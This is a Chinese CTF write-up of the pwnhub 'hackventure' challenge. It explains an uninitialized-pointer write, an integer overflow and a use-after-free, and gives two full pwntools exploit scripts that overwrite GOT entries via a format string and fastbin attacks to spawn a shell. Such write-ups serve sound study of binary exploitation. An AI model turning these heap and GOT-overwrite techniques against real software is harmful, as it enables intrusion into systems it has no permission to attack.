每周一胖 pwnhub之hackventure

漏洞类型:未定义指针引用、整数溢出、UAF
利用方法:控制未定义指针、UAF

程序入口:

root@kali ~/桌面# ./hackventure 
************************************************
* Welcome to Hackventure (Hack3r's Adventure). *
************************************************
$ list
list - list all commands
help - show usage of a command
map - show map
status - show player's status
go - make movement
explore - explore current location
goodnight - sleep at home until the morning of next day (HP refilled)
local_attack - attack the server at current location (-20 HP)
remote_attack - attack remote server from your bot at current location (-30 HP)
remote_attacks - attack remote servers from your bot at current location (-30 HP)
deploy - deploy something on your bot
proxy - set a parent proxy
buy - buy products from the store
$ 

在本题中,主要存在三个问题:
问题一 未定义指针引用,看一下local_attack中的实现代码

printf("You can specify a new name for the owned server.\nName length? ");
v3 = 63LL;
readn_without_null((__int64)&buffer, 63);
length = atoi(&buffer);               
if ( Server->nickname && (v4 = strlen((const char *)Server->nickname), v4 >= length)  || (v3 = length + 1, (v8 = realloc(0LL, v3)) != 0LL))
{
    if ( Server->nickname )
    {
      v5 = strlen((const char *)Server->nickname);
      if ( v5 > (unsigned __int64)length )
        v8 = Server->nickname;
    }
    printf("Name? ", v3);
    length = readn_without_null((__int64)v8, length);
    Server->nickname = v8;
    v2 = (char *)Server->nickname + length;
    *v2 = 0;
}

在成功控制一台服务器后,可以给这台机器命名,名称的长度任意且可控。但是在这儿的逻辑当中,如果在第一次控制时填入了长度为16的字符串,那么当再次控制时,再次使得输入长度等于16,将会导致v8是一个未定义指针。不难理解,如果可以控制栈上的内容的话,就可以实现任意内存写。在同级函数中,deploy函数可以在栈上填充的空间比较大

int __fastcall deploy(__int64 a1, __int64 a2)
{
  const char *v2; // rbx@3
  int v3; // eax@3
  int result; // eax@3
  __int64 v5; // [sp+0h] [bp-60h]@1
  char nptr; // [sp+10h] [bp-50h]@1

  printf("How many do you want to deploy? ", a2);
  readn_without_null((__int64)&nptr, 63);
  ...
}

但是实际测试时发现,如果分两次调用deploy和local_attack将会导致先前填充的栈被清空,实际上,这是因为触发了strtok操作导致栈内容发生改变

__int64 __fastcall parse_command(char *a1, __int64 a2)
{
  unsigned int v3; // [sp+14h] [bp-Ch]@1
  char *v4; // [sp+18h] [bp-8h]@1

  v4 = strtok(a1, " ");
  v3 = 0;
  while ( v4 )
  {
    *(_QWORD *)(a2 + 8LL * v3++) = v4;
    if ( v3 > 0xF )
      return v3;
    v4 = strtok(0LL, " ");
  }
  return v3;
}

那么有没有可能一次性输入两条命令,继续看主循环函数代码

    for ( i = 0; i <= 12; ++i )  //12次循环
    {
      if ( !strcasecmp(*v5, *(const char **)&commands[10 * i + 60]) )
      {
        if ( commands[10 * i + 62] == v4 )
        {
          (*(void (__fastcall **)(_QWORD, const char **))&commands[10 * i + 64])(v4, v5);
          v4 = 0;
        }
        else if ( commands[10 * i + 62] >= v4 )
        {
          puts("wrong arguments");
          printf("%s - %s\n    usage: %s\n", *v5, *(_QWORD *)&commands[10 * i + 66], *(_QWORD *)&commands[10 * i + 68]);
          v4 = 0;
        }
        else
        {
          (*(void (__fastcall **)(_QWORD, const char **))&commands[10 * i + 64])(commands[10 * i + 62], v5);  //执行命令
          v4 -= commands[10 * i + 62];
          v5 += commands[10 * i + 62]; //v5指针后移,实际上,这里加的是参数个数
        }
        break;
      }
    }

因此,本题的最终思路为控制血量最少(因为打起来最轻松)的服务器,并输入固定长度(长度根据需要确定)的名称,然后再去买点商店买点东西,接着回到服务器所在的位置并先打成残血,最后在一行命令里面执行deploy和local_attack来实现任意内存写。这里选择将atoi修改printf,接下来就可以用格式化字符串实现地址泄露,并在泄露完成后将atoi修改成system函数,以下是完整的利用代码

from pwn import *

slog = 0
if slog: context.log_level = True

p = process('./hackventure')

curpos = (0,0)
servers = []
home = (0,0)
store = (0,0)


def init_position():
    global curpos
    global servers
    global home
    global store
    p.recvuntil('$')
    p.sendline('map')
    p.recvuntil('+--------------------------------+')
    
    for y in range(16):
        #print y
        aline = p.recvline()[1:-2]
        #print aline
        if aline.find('*') != -1:
            curpos = (aline.find('*'), y)
        if aline.find('S') != -1:
            servers.append((aline.find('S'), y))
        if aline.find('H') != -1:
            home = (aline.find('H'), y)
        if aline.find('T') != -1:
            store = (aline.find('T'), y)    
        
    #print curpos, servers, home, store

def go(position):
    global curpos
    relativeX = position[0] - curpos[0]
    relativeY = position[1] - curpos[1]
    command = ''
    if relativeX < 0:
        command += abs(relativeX) * 'go LEFT\n'
    else:
        command += abs(relativeX) * 'go RIGHT\n'

    if relativeY < 0:
        command += abs(relativeY) * 'go UP\n'
    else:
        command += abs(relativeY) * 'go DOWN\n'
    p.recvuntil('$')
    p.sendline(command)
    curpos = position
    #print curpos, servers, home, store

def explore():
    global servers
    global target
    for i in range(len(servers)):
        go(servers[i])
        p.recvuntil('$')
        p.sendline('explore')
        p.recvline()
        data = p.recvuntil('Status')
        if 'HP: 100' in data:
            target = servers[i]
            break

def local_attack(name = 'aaaa'):
    p.recvuntil('$')
    p.sendline('local_attack')
    p.recvuntil('$')
    p.sendline('local_attack')
    p.recvuntil('length?')
    p.sendline(str(len(name)+1))
    p.recvuntil('Name?')
    p.sendline(name)    
    
def sleep():
    p.recvuntil('$')
    p.sendline('goodnight')     
    p.recvuntil('$')
    p.sendline('goodnight')     

def buy(count = 92233720368547758, goods_name = 'ExploitKit'):
    p.recvuntil('$')
    p.sendline('buy {0} {1}'.format(str(count), goods_name))

def deploy(count = 1, goods_name = 'ExploitKit'):
    p.recvuntil('$')
    p.sendline('deploy ExploitKit')
    p.recvuntil('want to deploy?')
    p.sendline(str(count))

init_position()
explore()
go(target)
local_attack('a'*8)

go(home)
sleep()
go(target)

p.recvuntil('$')
p.sendline('local_attack')
p.recvuntil('$')
p.sendline('deploy ExploitKit local_attack')
p.recvuntil('want to deploy?')

pwnfile = ELF('hackventure')
p.sendline('a' * 32 + p64(pwnfile.got['atoi']))
p.recvuntil('length?')
p.sendline('8')
p.recvuntil('Name?')
p.sendline(p64(pwnfile.plt['printf']))  

def call_printf(format_str):
    p.recvuntil('$')
    p.sendline('deploy haha')
    p.recvuntil('want to deploy?')
    p.sendline(format_str)
    
call_printf("aabb%9$s".ljust(8, 'a') + p64(pwnfile.got['printf']))
p.recvuntil('aabb')
printf_addr = u64(p.recv(6).ljust(8, '\x00'))
print 'printf addr is ', hex(printf_addr)

libc = ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
system_addr = libc.symbols['system'] - libc.symbols['printf'] + printf_addr
print 'system_addr is',hex(system_addr)

def generate_format(addr, value):
    payload = ''
    print_count = 0
    addr_part = ''
    for i in range(3):
        two_byte = (value >> (16*i)) & 0xffff
        payload += '%{0}c%{1}$hn'.format((two_byte - print_count) % 0x10000, 13 + i)
        print_count += (two_byte - print_count) % 0x10000
        addr_part += p64(addr + i*2)

    payload = payload.ljust(0x28, 'a')
    payload += addr_part
    return payload
#gdb.attach(p, open('debug'))
call_printf(generate_format(pwnfile.got['atoi'], system_addr))
p.sendline('deploy haha')
p.sendline("/bin/sh")
p.sendline('echo aabb')
p.recvuntil('aabb')

p.interactive()

问题二 整数溢出
整数溢出漏洞出现在buy功能中,先看下面的代码

int __fastcall buy(__int64 a1, __int64 a2)
{
  result = map_0[4 * (32LL * y + x)];
  if ( result == 3 )
  {
    for ( i = 0; i <= 3; ++i )
    {
      result = strcasecmp(*(const char **)(a2 + 16), goods_name[5 * i]);
      if ( !result )
      {
        count = atoi(*(const char **)(a2 + 8));
        cost = count * LODWORD(goods_name[5 * i + 3]);// 存在整数溢出
        if ( money < cost )
        {
          result = puts("Go away, poor man.");
        }
        else
        {
          money -= cost;

count没有范围限制,那么在输入一个很大的count值之后cost将会变成负数(这是最先发现的问题,然而作用不大)

问题三 UAF
这个漏洞(据说这个漏洞出题人自己也没有意识到,不得不佩服大佬们发现问题的能力,其次,就算是专业搞安全的人,也不见得写出来的代码就是安全的,因此,只要是人写的代码,就会有漏洞)出现在deploy功能中

(&hacker)[2 * (j + 2LL)][1] -= a1;
puts("Success.");
LODWORD(v3) = (&hacker)[2 * (j + 2LL)][1];
if ( !(_DWORD)v3 )
    LODWORD(v3) = (unsigned __int64)realloc((&hacker)[2 * (j + 2LL)], 0LL);// 等同于free

不难发现,这里在进行了free操作后并没有将指针置空,那就意味着可以无限次的进行free操作,对应商品的结构如下

struct Item
{
  _int32 count;
  _int32 type;   //共4种类型
}

我们可以按下面的方式构造堆块

----------------------- Item1
count(1)+type(1)
----------------------- Item2
count(1)+type(2)
----------------------- Item3
count(1)+type(3)
----------------------- Other block(防止堆块合并)

Item是使用金币购买的三种产品。题目默认给定的金币数量是100,因为后面需要多次购买,所以可以考虑使用整数溢出漏洞增加金币或者反复打HP100的服务器来挣钱。接下来考虑这样一种情况:依次free掉Item1、Item2、Item3,然后触发local_attack分配内存name,此时name将指向Item3,可以将name的内容构造成count(1)+type(3),就可以触发deploy中的free操作,此时Item3已经成了fastbin链的头结点,因此,其fd指针将保存的是Item2的地址,也就是堆地址,这个时候只要调用一下explore功能就可以打印出堆地址。


每周一胖 pwnhub之hackventure_第1张图片
泄露堆地址

到这里,利用似乎陷入了僵局,因为我们没有办法控制Item1、Item2、Item3的堆结构。事实上,可以通过分配一块较大的内存来触发fastbin合并(当然,这里应该还可以通过其他方法来控制内存,这里先不讨论)


每周一胖 pwnhub之hackventure_第2张图片
fastbin合并

这一步实际上解决了两个问题:泄露libc地址、将三个fastbin合并成一个大的堆块。现在,我们已经可以通过申请大小为0x50的内存的方式来控制Item2、Item3的完整堆结构了,后面可以按照下述思路拿shell:一、通过fastbin attack在main_arena上写入0x80用作堆头 二、再次通过fastbin attack控制main_arena的top指针(指向got表) 三、申请一块内存(大小为0x70)即可获得指向got的指针,此时可将修改aoti函数修改为system。在看writeup的时候,还提到了另外一种思路:通过修改stdout指针的方式去控制printf,有兴趣的同学可以试试。下面是完整的利用代码:
from pwn import *

slog = 0
debug = 1
if slog: context.log_level = True

p = process('./hackventure')

curpos = (0,0)
servers = []
home = (0,0)
store = (0,0)


def init_position():
    global curpos
    global servers
    global home
    global store
    p.recvuntil('$')
    p.sendline('map')
    p.recvuntil('+--------------------------------+')
    
    for y in range(16):
        aline = p.recvline()[1:-2]
        if aline.find('*') != -1:
            curpos = (aline.find('*'), y)
        while aline.find('S') != -1:
            posX = aline.find('S')
            servers.append((posX, y))
            aline = aline[:posX] + 'x' + aline[posX+1:]
        if aline.find('H') != -1:
            home = (aline.find('H'), y)
        if aline.find('T') != -1:
            store = (aline.find('T'), y)    
        
    #print curpos, servers, home, store

def go(position):
    global curpos
    relativeX = position[0] - curpos[0]
    relativeY = position[1] - curpos[1]
    command = ''
    if relativeX < 0:
        command += abs(relativeX) * 'go LEFT\n'
    else:
        command += abs(relativeX) * 'go RIGHT\n'

    if relativeY < 0:
        command += abs(relativeY) * 'go UP\n'
    else:
        command += abs(relativeY) * 'go DOWN\n'
    p.recvuntil('$')
    p.sendline(command)
    curpos = position
    #print curpos, servers, home, store

def explore_all():
    global servers
    global target
    global target2
    for i in range(len(servers)):
        go(servers[i])
        p.recvuntil('$')
        p.sendline('explore')
        p.recvuntil('IP: ')
        aline = p.recvline()
        servers[i] = (servers[i], aline[:-1])
        data = p.recvuntil('Status')
        if 'HP: 100' in data:
            target = servers[i][0]
        if 'HP: 200' in data:
            target2 = servers[i]

def local_attack(times = 2, success = True, name = 'aaaa', length = -1):
    for i in range(times):
        p.recvuntil('$')
        p.sendline('local_attack')
    if success:
        p.recvuntil('length?')
        if length != -1:
            p.sendline(str(length))
        else:
            p.sendline(str(len(name)+1))
        p.recvuntil('Name?')
        p.sendline(name)    

def remote_attack(server, ip):
    p.recvuntil('$')
    p.sendline('remote_attack ' + ip)
        
def rest():
    p.recvuntil('$')
    p.sendline('goodnight')     
    p.recvuntil('$')
    p.sendline('goodnight')     

def buy(count = 92233720368547758, goods_name = 'ExploitKit'):
    p.recvuntil('$')
    p.sendline('buy {0} {1}'.format(str(count), goods_name))

def deploy(count = 1, goods_name = 'ExploitKit'):
    p.recvuntil('$')
    p.sendline('deploy ' + goods_name)
    p.recvuntil('want to deploy?')
    p.sendline(str(count))

def explore():
    p.recvuntil('$')
    p.sendline('explore')


init_position()
explore_all()
goods_name = ['ExploitKit', 'SafeLine', 'D-Sensor', 'Proxy']
godds_price = {'ExploitKit': 200, 'SafeLine': 100, 'D-Sensor':50}
go(store)
special_count = (1 << 64) / 200 - 200

#make money
buy(special_count, 'ExploitKit')
buy(1, goods_name[1])
buy(1, goods_name[2])
buy(1, goods_name[3])
go(target)
local_attack()

for i in range(2):
    deploy(1, goods_name[1])
    deploy(1, goods_name[2])
    deploy(1, goods_name[3])

remote_attack(target, target2[1])
go(home)
rest()
go(target2[0])
local_attack(3, True, p32(2) + p32(1))
buy(1, goods_name[2])
for i in range(5):
    deploy(1, goods_name[2])

#leak heap addr
deploy(1, goods_name[1])
#deploy((special_count & 0xffffffff), goods_name[0])
explore()
p.recvuntil('Name: ')
heap_addr = u64(p.recvline()[:-1].ljust(8, '\x00')) - 0x40
print 'heap_addr is', hex(heap_addr)


def rename(_name = 'aaaa', _length = -1):
    go(home)
    rest()
    rest()
    go(target)
    local_attack(name = _name, length = _length)

#leak libc addr and trigger malloc_consolidate
rename(p64(0x70) + p64(0x21) + p64(0x80) + p64(0x21), 0x20000)
go(target2[0])
if debug: gdb.attach(p, open('debug'))
explore()

p.recvuntil('Name: ')
leak_libc_addr = u64(p.recvline()[:-1].ljust(8, '\x00')) - 0x40
print 'leak libc addr is', hex(leak_libc_addr)

libc = ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
libc_base = leak_libc_addr - 0x398b00 - 0x18

rename(p32(1) + p32(1) + p64(0)*2 + p64(0x71) + p32(2) + p32(1), 0x50)
deploy(1, goods_name[2])
deploy(1, goods_name[1])

#create fake heap in main_arena
rename(p32(1) +p32(1) + p64(0)*2 + p64(0x71) + p64(0x80), 0x50)
rename('aaaa', 0x60)

deploy(1, goods_name[1])
rename(p32(1) +p32(1) + p64(0)*2 + p64(0x81) + p32(2) + p32(1), 0x50)
deploy(1, goods_name[2])
deploy(1, goods_name[1])
rename(p32(1) +p32(1) + p64(0)*2 + p64(0x81) + p64(leak_libc_addr + 0x10), 0x50)
rename('aaaaaa', 0x70)

#alert main_arena->top to GOT table
rename(p64(0)*4 + p64(0x604080), 0x70)

#alert GOT of atoi to system
system_addr  = libc_base + libc.symbols['system']
rename(p64(0x400916) + p64(system_addr), 0xa0)
p.recvuntil('$ ')
p.sendline('deploy hackit')
p.recvuntil('want to deploy?')
p.sendline('/bin/sh')
p.interactive()

参考资料:
https://pwnhub.cn/media/writeup/112/5979cf77-0a4a-4095-bd6f-2eebc88a34f8_e5804144.pdf
https://pwnhub.cn/media/writeup/115/00e617c5-c794-456d-a656-3b8277a578bb_8282c1d1.pdf

你可能感兴趣的:(每周一胖 pwnhub之hackventure)